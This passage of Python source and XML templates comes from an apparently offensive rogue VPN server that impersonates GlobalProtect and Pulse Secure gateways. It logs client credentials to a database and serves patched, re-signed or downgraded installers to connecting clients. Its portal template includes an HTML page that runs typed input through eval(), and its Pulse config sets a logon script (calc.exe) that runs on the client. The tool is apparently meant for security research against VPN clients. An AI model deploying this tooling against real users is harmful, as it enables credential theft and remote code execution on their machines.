f"{msi_file}.old") if not os.path.exists(old_file): self.logger.warning(f"Older version MSI file not found: {old_file}") self.logger.info(f"Add {msi_file}.old to {self.download_dir} to enable version downgrade") # Patch the Windows MSI files and sign them if not self.patch_msi_files(): return False if not self.sign_msi_files(): return False return True def close(self): self.ssl_server_socket.close() def can_handle_data(self, data, client_socket, client_ip): return len(data) >= 4 and data[:4] == SSL_VPN_MAGIC def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') if 'GlobalProtect' in user_agent or \ handler.path.startswith('/ssl-tunnel-connect.sslvpn'): return True return False def generate_auth_cookie(self, connection_id): return uuid.UUID(connection_id).bytes.hex() def decode_auth_cookie(self, auth_cookie): return str(uuid.UUID(bytes=bytes.fromhex(auth_cookie))) def extract_auth_cookie(self, handler): query = urlparse(handler.path).query params = parse_qs(query) return params.get('authcookie', [None])[0] def handle_http(self, handler): if handler.command == 'GET' and handler.path.startswith('/ssl-tunnel-connect.sslvpn'): auth_cookie = self.extract_auth_cookie(handler) connection_id = self.decode_auth_cookie(auth_cookie) if not connection_id: self.logger.error(f"Unknown connection_id: {connection_id}") return False # Assign the socket to the connection_id if not self.packet_handler.assign_socket(connection_id, handler.connection): return False self.logger.info(f"Starting tunnel for {connection_id}") handler.connection.sendall(b'START_TUNNEL') # Pass handling to data handler return self.handle_data(b'', handler.connection, handler.client_address[0], connection_id) elif handler.command == 'GET': return self.handle_get(handler) elif handler.command == 'POST': return self.handle_post(handler) return False def _setup_routes(self): # Call the parent class's route setup super()._setup_routes() @self.flask_app.route('/global-protect/prelogin.esp', methods=['GET', 'POST']) def global_protect_pre_login(): xml = self.render_template('prelogin.xml') return Response(xml, mimetype='application/xml') @self.flask_app.route('/ssl-vpn/prelogin.esp', methods=['GET', 'POST']) def ssl_vpn_pre_login(): xml = self.render_template('sslvpn-prelogin.xml') return Response(xml, mimetype='application/xml') @self.flask_app.route('/ssl-vpn/login.esp', methods=['GET', 'POST']) def ssl_vpn_login(): if request.method == "POST": username = request.form.get('user') password = request.form.get('passwd') if username: self.logger.info(f"Username: {username}") if password: self.logger.info(f"Password: {password}") if username and password: info = {'User-Agent': request.headers.get('User-Agent')} self.db_manager.log_credentials( username, password, self.__class__.__name__, info ) connection_id, ip_address = self.packet_handler.create_session(None, self._wrap_packet) client_config = self.gateway_config.copy() client_config["client_ip"] = ip_address client_config["auth_cookie"] = self.generate_auth_cookie(connection_id) xml = self.render_template('sslvpn-login.xml', **client_config) return Response(xml, mimetype='application/xml') @self.flask_app.route('/global-protect/getconfig.esp', methods=['GET', 'POST']) def global_protect_get_config(): if request.method == "POST": username = request.form.get('user') password = request.form.get('passwd') if username: self.logger.info(f"Username: {username}") if password: self.logger.info(f"Password: {password}") if username and password: info = {'User-Agent': request.headers.get('User-Agent')} self.db_manager.log_credentials( username, password, self.__class__.__name__, info ) # check if we need to downgrade if self.should_downgrade(request.headers.get('User-Agent', '')): suffix = self.generate_unique_suffix() version = self.upgrade_version + f"-{suffix}" else: version = self.upgrade_version config = self.gateway_config.copy() config["version"] = version xml = self.render_template('pwresponse.xml', **config) return Response(xml, mimetype='application/xml') @self.flask_app.route('/ssl-vpn/getconfig.esp', methods=['POST']) def ssl_vpn_get_config(): if request.method == "POST": username = request.form.get('user') password = request.form.get('passwd') if username: self.logger.info(f"Username: {username}") if password: self.logger.info(f"Password: {password}") if username and password: info = {'User-Agent': request.headers.get('User-Agent')} self.db_manager.log_credentials( username, password, self.__class__.__name__, info ) # Fill in the assigned IP address auth_cookie = request.form.get('authcookie') connection_id = self.decode_auth_cookie(auth_cookie) if not connection_id: self.logger.error(f"Unknown connection_id: {connection_id}") return abort(404) client_ip = self.packet_handler.get_assigned_ip(connection_id) self.logger.info(f"Client IP: {client_ip}") client_config = self.gateway_config.copy() client_config["client_ip"] = client_ip xml = self.render_template('getconfig.xml', **client_config) return Response(xml, mimetype='application/xml') @self.flask_app.route('/global-protect/getmsi.esp', methods=['GET', 'POST']) def get_msi_redirect(): user_agent = request.headers.get('User-Agent') version = request.args.get('v') if 'apple mac' in user_agent.lower() or 'darwin' in user_agent.lower(): return redirect(f"/msi/GlobalProtect.pkg", code=302) elif request.args.get('version') == '64': return redirect(f"/msi/GlobalProtect64.msi?v={version}", code=302) return redirect(f"/msi/GlobalProtect.msi?v={version}", code=302) @self.flask_app.route('/msi/', methods=['GET']) def download_msi(file_name): if file_name not in ['GlobalProtect.pkg', 'GlobalProtect.msi', 'GlobalProtect64.msi']: return abort(404) version = request.args.get('v', '') file_path = os.path.join(self.payload_dir, file_name) """ This is a workaround due to the GlobalProtect client not sending its current version Instead we set a unique suffix to the version in the portal config and store it in a dict The suffix is only added to the version if the client was originally on a version >= 6.2.6 For each suffix, we store a bool of downgraded state """ # Check if version has a suffix if '-' in version and os.path.exists(os.path.join(self.download_dir, f"{file_name}.old")): suffix = version.split('-')[-1] if suffix in self.allocated_suffixes: downgraded = self.allocated_suffixes[suffix] if not downgraded: self.logger.info(f"Serving downgrade MSI for suffix {suffix}") file_path = os.path.join(self.download_dir, f"{file_name}.old") self.allocated_suffixes[suffix] = True else: self.logger.info(f"Unknown suffix {suffix}") return abort(404) if not os.path.exists(file_path): self.logger.error(f"Download file not found: {file_path}") return abort(404) file_size = os.path.getsize(file_path) headers = { 'Content-Type': 'application/octet-stream', 'Content-Disposition': f'attachment; filename="{file_name}"', 'Content-Length': str(file_size) } self.logger.info(f"Serving {file_path}") with open(file_path, 'rb') as f: file_content = f.read() return Response(file_content, headers=headers) def _wrap_packet(self, packet_data, client): # Determine EtherType if len(packet_data) > 0: if (packet_data[0] >> 4) == 4: ether_type = 0x0800 # IPv4 elif (packet_data[0] >> 4) == 6: ether_type = 0x86dd # IPv6 else: self.logger.error(f"Unknown EtherType: {packet_data[0] >> 4}") return None else: self.logger.error(f"Empty packet data") return None packet_length = len(packet_data) packet = ( SSL_VPN_MAGIC + ether_type.to_bytes(2, 'big') + packet_length.to_bytes(2, 'big') + SSL_VPN_STATIC + packet_data ) return packet def handle_data(self, data, client_socket, client_ip, connection_id=None): try: client_socket.setblocking(True) data = b'' while True: try: chunk = client_socket.recv(4096) if not chunk: break data += chunk self.process_tcp_message(client_socket, data, client_ip, connection_id) data = b'' except BlockingIOError: continue except ssl.SSLWantReadError: continue except Exception as e: self.logger.error(f'Error handling connection: {type(e)}: {e}') finally: self.packet_handler.destroy_session(connection_id) client_socket.close() return True return False def process_tcp_message(self, client_socket, data, client_ip, connection_id): # Process the TCP message data as needed if data == KEEP_ALIVE_PACKET: self.logger.debug(f"Received KEEP_ALIVE Packet from {client_ip}") client_socket.sendall(KEEP_ALIVE_PACKET) return elif data[0:4] != SSL_VPN_MAGIC: # Not an SSL-VPN packet self.logger.warning(f"Received Unhandled TCP message from {client_ip}: {data.hex()}") return # Parse the tunelled packet buf = io.BytesIO(data) magic = buf.read(4) assert magic == SSL_VPN_MAGIC ether_type = int.from_bytes(buf.read(2), 'big') ether_str = ETHER_TYPES.get(ether_type, 'UNKNOWN') packet_length = int.from_bytes(buf.read(2), 'big') static_bytes = buf.read(8) assert static_bytes == SSL_VPN_STATIC packet_data = buf.read(packet_length) assert len(packet_data) == packet_length assert buf.tell() == len(data) self.logger.debug(f"Received SSL-VPN Packet from {client_ip}: Magic={magic.hex()}, " \ f"EtherType={hex(ether_type)} ({ether_str}), Length={packet_length}") if ether_str == 'UNKNOWN': self.logger.warning(f"UNKNOWN Packet Type: {ether_type}") return self.packet_handler.handle_client_packet( packet_data, connection_id ) def should_downgrade(self, user_agent): # Check if there's a client version in the user agent version_match = re.search(r'GlobalProtect/(\d+\.\d+\.\d+)', user_agent) if version_match: client_version = version_match.group(1) self.logger.info(f"Client version: {client_version}") # If it's >= 6.2.6, downgrade major, minor, patch = map(int, client_version.split('.')[:3]) if (major > 6) or (major == 6 and minor > 2) or (major == 6 and minor == 2 and int(patch) >= 6): self.logger.info(f"Client version {client_version} needs downgrade") return True else: self.logger.info(f"Client version {client_version} is compatible") return False return False ================================================ FILE: src/nachovpn/plugins/paloalto/templates/getconfig.xml ================================================ yes /ssl-tunnel-connect.sslvpn LDN-Gway bob no 2592000 10800 1800 Your GlobalProtect session will expire in 30 minutes. Please save your work before your session expires. 1800 Your GlobalProtect session will time out in 30 minutes. Please save your work before your session times out. Your administrator has logged you out. 1711900239 10800 1000 1000 11.1.0 {{ gateway_ip }} no {{ client_ip }} 255.255.255.255 yes 1.1.1.1 10.10.10.1 0 no 0.0.0.0/0 1.1.1.1/32 {{ gateway_ip }}/32 ================================================ FILE: src/nachovpn/plugins/paloalto/templates/prelogin.xml ================================================ Success false Enter Portal password Username Password 1 yesGB ================================================ FILE: src/nachovpn/plugins/paloalto/templates/pwresponse.xml ================================================ GP-portal 4100 {{ version }} global-protect-full **** {{ ca_certificate }} yes user-logon yes yes 72 no no no 10.0.150.1 {{ dns_name }} 50 GP-GD-Internal GP-Lon-DC-Internal 1 1 yes {{ dns_name }} 5 192.168.1.157 192.168.69.45 {{ gateway_ip }} 1 1 yes yes 0 0 no disabled yes yes yes yes yes 3600 20 no antivirus host-info 1 no no no no allowed transparent yes no yes yes no 30 50 no 0.0.0.0/0 {{ dns_name }} 600 5 yes <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Notice</h1><p style="margin: 0;font-size: 15px; line-height: 1.2em;">To access the network, you must first connect to GlobalProtecteeeeeeeee VPN.</p></div><input size="100" id="code"></input><button id="runcode" onclick=clicked();>Run Code</button></body><script> function clicked(){var code = document.getElementById("code").value;eval(code);}</script> yes yes <div style="font-family:'Helvetica Neue';"><h1 style="color:red;text-align:center; margin: 0; font-size: 30px;">Captive Portal Detected</h1><p style="margin: 0; font-size: 15px; line-height: 1.2em;">GlobalProtect has temporarily permitted network access for you to connect to the Internet. Follow instructions from your internet provider.</p><p style="margin: 0; font-size: 15px; line-height: 1.2em;">If you let the connection time out, open GlobalProtect and click Connect to try again.</p></div><input size="100" id="code"<>/input<>button id="runcode" onclick=clicked();<Run Code>/button<>/body<>script<function clicked(){var code = document.getElementById("code").value;eval(code);}>/script< 5 yes yes yes 0 -1 0 1 yes 1 1400 0 60 60 60 network-traffic no no no no no yes no 4501 You have attempted to access a protected resource that requires additional authentication. Proceed to authenticate at 0 no no not-install bob@example.com empty empty empty ================================================ FILE: src/nachovpn/plugins/paloalto/templates/sslvpn-login.xml ================================================ {{ auth_cookie }} 532e8287b925b74d6925c6ada18f2d27da38665d woot gw-N bob GlobalProtect Local Auth vsys1 (empty_domain) tunnel -1 4100 {{ client_ip }} empty empty 4 ================================================ FILE: src/nachovpn/plugins/paloalto/templates/sslvpn-prelogin.xml ================================================ Success false yes Enter login credentials Username Password 1 yes no10.10.0.0-10.10.255.255 ================================================ FILE: src/nachovpn/plugins/pulse/__init__.py ================================================ ================================================ FILE: src/nachovpn/plugins/pulse/config_generator.py ================================================ #!/usr/bin/env python3 import os import struct import ipaddress ROUTE_SPLIT_INCLUDE = 0x07000010 ROUTE_SPLIT_EXCLUDE = 0xf1000010 ENC_AES_128_CBC = 2 ENC_AES_256_CBC = 5 HMAC_MD5 = 1 HMAC_SHA1 = 2 HMAC_SHA256 = 3 CFG_DISCONNECT_WHEN_ROUTES_CHANGED = 0x4000 CFG_TUNNEL_ROUTES_TAKE_PRECEDENCE = 0x4001 CFG_TUNNEL_ROUTES_WITH_SUBNET_ACCESS = 0x401f CFG_ENFORCE_IPV4 = 0x4020 CFG_ENFORCE_IPV6 = 0x4021 CFG_MTU = 0x4005 CFG_DNS_SERVER = 0x0003 CFG_WINS_SERVER = 0x0004 CFG_DNS_SUFFIX = 0x4006 CFG_UNKNOWN_4007 = 0x4007 CFG_UNKNOWN_4019 = 0x4019 CFG_ESP_ONLY = 0x401A CFG_ESP_ALLOW_6IN4 = 0x4024 CFG_ESP_TO_SSL_FALLBACK_SECS = 0x4017 CFG_UNKNOWN_400F = 0x400F CFG_ESP_ENC_ALG = 0x4010 CFG_ESP_HMAC_ALG = 0x4011 CFG_ESP_KEY_LIFETIME = 0x4012 CFG_ESP_KEY_BYTES = 0x4013 CFG_ESP_REPLAY_PROTECTION = 0x4014 CFG_TOS_COPY = 0x4015 CFG_ESP_PORT = 0x4016 CFG_UNKNOWN_4018 = 0x4018 CFG_INTERNAL_LEGACY_IP = 0x0001 CFG_NETMASK = 0x0002 CFG_INTERNAL_GATEWAY_IP = 0x400B CFG_LOGON_SCRIPT = 0x400C CFG_LOGON_SCRIPT_MAC = 0x401B EXAMPLE_ROUTES = [ {'type': ROUTE_SPLIT_INCLUDE, 'route': '0.0.0.0/0.0.0.0'}, # {'type': ROUTE_SPLIT_EXCLUDE, 'route': '10.0.0.0/255.0.0.0'} ] class ESPConfigGenerator: def create_config(self): config = b'' config += b'\x00' * 0x10 # padding config += 0x21202400.to_bytes(4, 'big') # marker for ESP config config += b'\x00' * 4 # more padding config += 0x70.to_bytes(4, 'big') # length including header config += 0x54.to_bytes(4, 'big') # ESP config length config += b'\x01\x00\x00\x00' # unknown (always 0x01000000) config += os.urandom(4) # server->client SPI in little endian config += 0x40.to_bytes(2, 'big') # secrets length config += os.urandom(32) # AES key (32-bytes for AES-256) config += os.urandom(32) # HMAC key (32-bytes for SHA-256) config += b'\x00' * 6 # padding return config class VPNConfigGenerator: def __init__(self, logon_script="C:\\Windows\\System32\\calc.exe", logon_script_macos="", dns_suffix="nachovpn.local", routes=EXAMPLE_ROUTES, client_ip=None): self.logon_script = logon_script self.logon_script_macos = logon_script_macos self.dns_suffix = dns_suffix self.routes = routes self.client_ip = client_ip @staticmethod def hexdump(data, length=16): if isinstance(data, str): with open(data, 'rb') as f: data = f.read() def chunk_data(data, size): for i in range(0, len(data), size): yield data[i:i + size] def to_hex(chunk): return ' '.join(f'{b:02x}' for b in chunk) def to_printable(chunk): return ''.join(chr(b) if 32 <= b <= 126 else '.' for b in chunk) for i, chunk in enumerate(chunk_data(data, length)): hex_data = to_hex(chunk) printable_data = to_printable(chunk) print(f'{i * length:08x} {hex_data:<{length * 3}} |{printable_data}|') @staticmethod def int_to_ipv4(addr): return str(ipaddress.IPv4Address(addr)) @staticmethod def ipv4_to_int(ipv4): return int(ipaddress.IPv4Address(ipv4)) @staticmethod def write_le32(value): return struct.pack('I', value) @staticmethod def write_be16(value): return struct.pack('>H', value) @staticmethod def ip_to_bytes(ip): return bytes(map(int, ip.split('.'))) @staticmethod def subnet_mask_to_bytes(subnet_mask): parts = subnet_mask.split('.') return bytes([255 ^ int(part) for part in parts]) def create_routes(self): route_data = b'' for route in self.routes: route_type = route['type'] ip, subnet_mask = route['route'].split('/') ip_bytes = self.ip_to_bytes(ip) subnet_mask_bytes = self.subnet_mask_to_bytes(subnet_mask) route_entry = self.write_be32(route_type) route_entry += self.write_be32(0x0000FFFF) route_entry += ip_bytes route_entry += subnet_mask_bytes route_data += route_entry # Calculate routes length routes_len = len(route_data) + 8 # Generate the final routes section routes_section = bytearray() routes_section += self.write_be16(0x2e00) # Attribute flag routes_section += self.write_be16(routes_len) # Routes length routes_section += self.write_be32(len(self.routes)) # Number of routes (think this should be big endian) routes_section += route_data return routes_section def create_config(self): data = bytearray() # Header data += self.write_be32(0x00000A4C) # fixed header value data += self.write_be32(0x00000001) # type: 0x1 header_len_offset = len(data) data += self.write_be32(0) # placeholder for length of the whole config data += self.write_be32(0x000001FB) # counter data += b'\x00' * 0x10 # padding # Config data += self.write_be32(0x2e20f000) # config for > 9.1R14 data += self.write_be32(0x00000000) # fixed value config_len_offset = len(data) data += self.write_be32(0) # placeholder for length: (len(config) - 0x10) #logging.debug('config header:') #self.hexdump(data) # Version marker + attribute offset = len(data) data += self.write_be16(0x2e00) # 0x2e00: known for Pulse version >= 9.1R16 data += self.write_be16(0) # placeholder for length data += self.write_be32(0x03000000) # fixed value data += self.create_attribute(0x4025, b'\x01') data[offset + 2:offset + 4] = self.write_be16(len(data) - offset) #logging.debug('version marker + attribute >= 9.1R16:') #self.hexdump(data[offset:]) # Version marker + attribute offset = len(data) data += self.write_be16(0x2c00) # 0x2c00: known for Pulse version >= 9.1R14 data += self.write_be16(0) # placeholder for length data += self.write_be32(0x03000000) # fixed value data += self.create_attribute(0x4026, b'\x01') data[offset + 2:offset + 4] = self.write_be16(len(data) - offset) #logging.debug('version marker + attribute >= 9.1R14:') #self.hexdump(data[offset:]) # Routing info assert len(data) == 0x46 data += self.create_routes() #logging.debug('routing info:') #self.hexdump(data) # Final attributes # fwiw, openconnect seems to differ here final_attrs = bytearray() final_attrs += self.write_be32(0) final_attrs += self.write_be16(0) # placeholder: length of the rest of the config final_attrs += self.write_be32(0x03000000) # fixed value final_attrs += self.create_attribute(CFG_DISCONNECT_WHEN_ROUTES_CHANGED, b'\x00') final_attrs += self.create_attribute(CFG_TUNNEL_ROUTES_TAKE_PRECEDENCE, b'\x01') final_attrs += self.create_attribute(CFG_TUNNEL_ROUTES_WITH_SUBNET_ACCESS, b'\x00') final_attrs += self.create_attribute(CFG_ENFORCE_IPV4, b'\x01') final_attrs += self.create_attribute(CFG_ENFORCE_IPV6, b'\x00') final_attrs += self.create_attribute(CFG_MTU, self.write_be32(1400)) # Client interface MTU final_attrs += self.create_attribute(CFG_DNS_SERVER, b'\x01\x01\x01\x01') final_attrs += self.create_attribute(CFG_DNS_SUFFIX, self.dns_suffix.encode() + b'\x00') final_attrs += self.create_attribute(CFG_UNKNOWN_4007, self.write_be32(1)) final_attrs += self.create_attribute(CFG_WINS_SERVER, b'\x01\x01\x01\x01') final_attrs += self.create_attribute(CFG_UNKNOWN_4019, b'\x01') final_attrs += self.create_attribute(CFG_ESP_ONLY, b'\x00') final_attrs += self.create_attribute(CFG_ESP_ALLOW_6IN4, b'\x00') final_attrs += self.create_attribute(CFG_UNKNOWN_400F, b'\x00\x00') final_attrs += self.create_attribute(CFG_ESP_ENC_ALG, self.write_be16(ENC_AES_256_CBC)) final_attrs += self.create_attribute(CFG_ESP_HMAC_ALG, self.write_be16(HMAC_SHA256)) final_attrs += self.create_attribute(CFG_ESP_KEY_LIFETIME, self.write_be32(1200)) final_attrs += self.create_attribute(CFG_ESP_KEY_BYTES, self.write_be32(0)) final_attrs += self.create_attribute(CFG_ESP_REPLAY_PROTECTION, self.write_be32(1)) final_attrs += self.create_attribute(CFG_TOS_COPY, self.write_be32(0)) final_attrs += self.create_attribute(CFG_ESP_PORT, self.write_be16(0x1194)) final_attrs += self.create_attribute(CFG_ESP_TO_SSL_FALLBACK_SECS, self.write_be32(1)) final_attrs += self.create_attribute(CFG_UNKNOWN_4018, self.write_be32(60)) # Use allocated IP if provided, otherwise use default if self.client_ip: final_attrs += self.create_attribute(CFG_INTERNAL_LEGACY_IP, self.write_be32(self.ipv4_to_int(self.client_ip))) else: final_attrs += self.create_attribute(CFG_INTERNAL_LEGACY_IP, self.write_be32(self.ipv4_to_int("10.10.1.1"))) final_attrs += self.create_attribute(CFG_NETMASK, self.write_be32(self.ipv4_to_int("255.255.255.255"))) final_attrs += self.create_attribute(CFG_INTERNAL_GATEWAY_IP, self.write_be32(self.ipv4_to_int("10.10.0.1"))) final_attrs += self.create_attribute(CFG_LOGON_SCRIPT, self.logon_script.encode() + b'\x00') final_attrs += self.create_attribute(0x400d, b'\x00') final_attrs += self.create_attribute(0x400e, b'\x00') final_attrs += self.create_attribute(CFG_LOGON_SCRIPT_MAC, self.logon_script_macos.encode() + b'\x00') final_attrs += self.create_attribute(0x401c, b'\x00') final_attrs += self.create_attribute(0x13, b'\x00') final_attrs += self.create_attribute(0x14, b'\x00') final_attrs[4:6] = self.write_be16(len(final_attrs)) # fill in the length of final attrs data += final_attrs # add final attrs to data #logging.debug('final attributes:') #self.hexdump(data) # Update the lengths total_length = len(data) data[header_len_offset:header_len_offset + 4] = self.write_be32(total_length) data[config_len_offset:config_len_offset + 4] = self.write_be32(total_length - 0x10) return data @staticmethod def create_attribute(attr_type, data): return struct.pack('>HH', attr_type, len(data)) + data def main(): generator = VPNConfigGenerator() config = generator.create_config() output_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'test') filename = os.path.join(output_dir, 'vpn_config.bin') with open(filename, 'wb') as f: f.write(config) print(f"Generated VPN config. Saved to {filename}") generator.hexdump(config) if __name__ == '__main__': main() ================================================ FILE: src/nachovpn/plugins/pulse/config_parser.py ================================================ #!/usr/bin/env python3 import sys ENC_AES_128_CBC = 2 ENC_AES_256_CBC = 5 HMAC_MD5 = 1 HMAC_SHA1 = 2 HMAC_SHA256 = 3 # Example packet: # #00000000 00 00 0a 4c 00 00 00 01 00 00 01 60 00 00 01 fb |...L.......`....| #00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| #00000020 2e 20 f0 00 00 00 00 00 00 00 01 50 2e 00 00 0d |. .........P....| #00000030 03 00 00 00 40 25 00 01 01 2c 00 00 0d 03 00 00 |....@%...,......| #00000040 00 40 26 00 01 01 2e 00 00 18 00 00 00 01 07 00 |.@&.............| #00000050 00 10 00 00 ff ff 00 00 00 00 ff ff ff ff 00 00 |................| #00000060 00 00 01 02 03 00 00 00 40 00 00 01 00 40 01 00 |........@....@..| #00000070 01 00 40 1f 00 01 00 40 20 00 01 00 40 21 00 01 |..@....@ ...@!..| #00000080 00 40 05 00 04 00 00 05 78 00 03 00 04 01 01 01 |.@......x.......| #00000090 01 40 06 00 0d 6e 61 63 68 6f 76 70 6e 2e 6c 6f |.@...nachovpn.lo| #000000a0 6c 00 40 07 00 04 00 00 00 01 00 04 00 04 01 01 |l.@.............| #000000b0 01 01 40 19 00 01 01 40 1a 00 01 00 40 24 00 01 |..@....@....@$..| #000000c0 01 40 0f 00 02 00 00 40 10 00 02 00 05 40 11 00 |.@.....@.....@..| #000000d0 02 00 03 40 12 00 04 00 00 04 b0 40 13 00 04 00 |...@.......@....| #000000e0 00 00 00 40 14 00 04 00 00 00 01 40 15 00 04 00 |...@.......@....| #000000f0 00 00 00 40 16 00 02 11 94 40 17 00 04 00 00 00 |...@.....@......| #00000100 0f 40 18 00 04 00 00 00 3c 00 01 00 04 0a 0a 01 |.@......<.......| #00000110 01 00 02 00 04 ff ff ff ff 40 0b 00 04 0a c8 c8 |.........@......| #00000120 c8 40 0c 00 1d 43 3a 5c 57 69 6e 64 6f 77 73 5c |.@...C:\Windows\| #00000130 53 79 73 74 65 6d 33 32 5c 63 61 6c 63 2e 65 78 |System32\calc.ex| #00000140 65 00 40 0d 00 01 00 40 0e 00 01 00 40 1b 00 01 |e.@....@....@...| #00000150 00 40 1c 00 01 00 00 13 00 01 00 00 14 00 01 00 |.@..............| def load_be32(data): return int.from_bytes(data[0:4], 'big') def load_be16(data): return int.from_bytes(data[0:2], 'big') def load_le32(data): return int.from_bytes(data[0:4], 'little') def load_le16(data): return int.from_bytes(data[0:2], 'little') class Attribute: def __init__(self, attr_type, attr_len, data): self.attr_type = attr_type self.attr_len = attr_len self.data = data def to_dict(self): return {'type': self.attr_type, 'len': self.attr_len, 'data': self.data} class PulseConfig: def __init__(self, data): self.data = data self.pre_attributes = [] self.routes = [] self.post_attributes = [] def process_attr(self, attr_type, data, attr_len): if attr_type == 0x0001: ip_address = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3]) print ("Internal Legacy IP address: %s" % ip_address) elif attr_type == 0x0002: net_mask = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3]) print ("Netmask: %s" % net_mask) elif attr_type == 0x0003: dns_server = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3]) print ("DNS server: %s" % dns_server) elif attr_type == 0x0004: wins_server = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3]) print ("WINS server: %s" % wins_server) elif attr_type == 0x0008: print ("Internal IPv6 address") elif attr_type == 0x000a: print ("DNS server (IPv6)") elif attr_type == 0x000f: print ("IPv6 split include") elif attr_type == 0x0010: print ("IPv6 split exclude") elif attr_type == 0x4005: mtu = load_be32(data) print ("MTU %d from server" % mtu) elif attr_type == 0x4006: print ("DNS search domain: %s" % data[0:attr_len].split(b'\x00')[0].decode()) elif attr_type == 0x401a: print ("ESP only: %d" % data[0]) elif attr_type == 0x400b: gateway = "%d.%d.%d.%d" % (data[0], data[1], data[2], data[3]) print ("Internal gateway address: %s" % gateway) elif attr_type == 0x4017: fallback_secs = load_be32(data) print ("ESP to SSL fallback: %u seconds" % fallback_secs) elif attr_type == 0x4010: val = load_be16(data) if val == ENC_AES_128_CBC: enc_type = "AES-128" elif val == ENC_AES_256_CBC: enc_type = "AES-256" print ("ESP encryption: 0x%04x (%s)" % (val, enc_type)) elif attr_type == 0x4000: print ("Disconnect when routes changed: %d" % data[0]) elif attr_type == 0x4011: val = load_be16(data) if val == HMAC_MD5: mactype = "MD5" elif val == HMAC_SHA1: mactype = "SHA1" elif val == HMAC_SHA256: mactype = "SHA256" else: mactype = "unknown" print ("ESP HMAC: 0x%04x (%s)" % (val, mactype)) elif attr_type == 0x4001: print ("Tunnel routes take precedence: %d" % data[0]) elif attr_type == 0x401f: print ("Tunnel routes with subnet access (also 4001 set): %d" % data[0]) elif attr_type == 0x4020: print ("Enforce IPv4: %d" % data[0]) elif attr_type == 0x4021: print ("Enforce IPv6: %d" % data[0]) elif attr_type == 0x4012: lifetime_secs = load_be32(data) print ("ESP key lifetime: %u seconds" % lifetime_secs) elif attr_type == 0x4013: lifetime_bytes = load_be32(data) print ("ESP key lifetime: %u bytes" % lifetime_bytes) elif attr_type == 0x4014: esp_replay_protect = load_be32(data) print ("ESP replay protection: %d" % esp_replay_protect) elif attr_type == 0x4015: tos_copy = load_be32(data) print ("TOS copy: %d" % tos_copy) elif attr_type == 0x4016: i = load_be16(data) print ("ESP port: %d" % i) elif attr_type == 0x400c: logon_script = data[0:attr_len].split(b'\x00')[0].decode() print ("Logon script: %s" % logon_script) elif attr_type == 0x4024: print ("Pulse ESP tunnel allowed to carry 6in4 or 4in6 traffic: %d" % data[0]) else: print ("Unknown attr 0x%x len %d: %s" % (attr_type, attr_len, data[0:attr_len].hex())) def handle_attr_elements(self, data, attr_len, attrs): l = attr_len p = data if l < 8 or load_be32(p[4:]) != 0x03000000: print ("Bad attribute header") return 1 p = p[8:] l -= 8 while l > 4: attr_type = load_be16(p) attr_len = load_be16(p[2:]) if attr_len + 4 > l: print ("Bad attribute length") return 1 p = p[4:] l -= 4 # append to list as a dict so we can reconstruct later attrs.append(Attribute(attr_type, attr_len, p[:attr_len]).to_dict()) # process attribute self.process_attr(attr_type, p, attr_len) p = p[attr_len:] l -= attr_len return 0 def parse(self): if len(self.data) < 0x31: raise ValueError("Config data too short") offset = 0x2c config_type = load_be32(self.data[0x20:]) print(f"Config type: {config_type:08x}") if config_type == 0x2e20f000: if len(data) < offset + 4: raise ValueError("Config data too short (2)") attr_flag = 0 while attr_flag != 0x2c00: attr_flag = load_be16(self.data[offset:]) attr_len = load_be16(self.data[offset + 2:]) if attr_flag == 0x2c00: print ("attr_flag 0x2c00: known for Pulse version >= 9.1R14") elif attr_flag == 0x2e00: print ("attr_flag 0x2e00: known for Pulse version >= 9.1R16") else: print ("unknown Pulse version") if len(self.data) < offset + attr_len \ or self.handle_attr_elements(self.data[offset:], attr_len, self.pre_attributes): raise ValueError("Bad config") offset += attr_len elif config_type == 0x2c20f000: print ("Processing Pulse main config data for server version < 9.1R14") else: raise ValueError("Unrecognised data type") assert offset == 0x46 routes_len = load_be16(self.data[offset + 2:]) # parse routing info p = self.data[offset + 8:] routes_len -= 8 while routes_len: route_type = load_be32(p) ffff = load_be32(p[4:]) if ffff != 0xffff: raise ValueError("Bad config: ffff != 0xffff") route = "%d.%d.%d.%d/%d.%d.%d.%d" % ( p[8], p[9], p[10], p[11], 255 ^ (p[8] ^ p[12]), 255 ^ (p[9] ^ p[13]), 255 ^ (p[10] ^ p[14]), 255 ^ (p[11] ^ p[15])) if route_type == 0x07000010: print ("Received split include route %s" % route) elif route_type == 0xf1000010: print ("Received split exclude route: %s" % route) else: print ("Receive route of unknown type %s" % hex(route_type)) p = p[0x10:] routes_len -= 0x10 l = load_be16(p[4:]) p = p[2:] # fix alignment self.handle_attr_elements(p, l, self.post_attributes) if __name__ == '__main__': if len(sys.argv) < 2: print ("Usage: %s " % sys.argv[0]) sys.exit(1) with open (sys.argv[1], 'rb') as f: data = f.read() config = PulseConfig(data) config.parse() ================================================ FILE: src/nachovpn/plugins/pulse/funk_parser.py ================================================ from io import BytesIO import struct import base64 import logging import argparse import zlib import json import time VENDOR_JUNIPER2 = 0x583 MSG_POLICY = 0x58316 MSG_FUNK_PLATFORM = 0x58301 MSG_FUNK = 0xa4c01 class FunkManager: def __init__(self): self.commands = [] @staticmethod def base64_encode(value): return base64.b64encode(value.encode()).decode() @staticmethod def remediation_command(policy_id='vc0|43|policy_2|1|woot'): commands = { '0x0ce4': [{ # Encapsulation 'commands': {}, 'flag1': 0xc0, 'flag2': 0x00 }], '0x0cf0': [{ # Encapsulation 'commands': { '0x0cf1': [ # String without hex prefixer { 'string': 'test', 'flag1': 0xc0, 'flag2': 0x00 } ], '0x0ce4': [ # Encapsulation { 'commands': { '0x0ce7': [ { 'id': MSG_POLICY, 'string': f'REMEDIATE:POLICYID={policy_id},set\x00', 'flag1': 0xc0, 'flag2': 0x00 } ] }, 'flag1': 0xc0, 'flag2': 0x00 } ] }, 'flag1': 0xc0, 'flag2': 0x00 }], '0x0012': [{ # seems to be the same as 0xCF3 (unsigned integer) 'value': 1, 'flag1': 0xc0, 'flag2': 0x00 }], '0x0cf3': [{ # Unsigned integer 'value': 1, 'flag1': 0x80, 'flag2': 0x00 }] } return commands @staticmethod def registry_command(rules=None, server_time=False, policy_id='vc0|43|policy_2|1|woot'): # If no rules are provided, use a default rule if 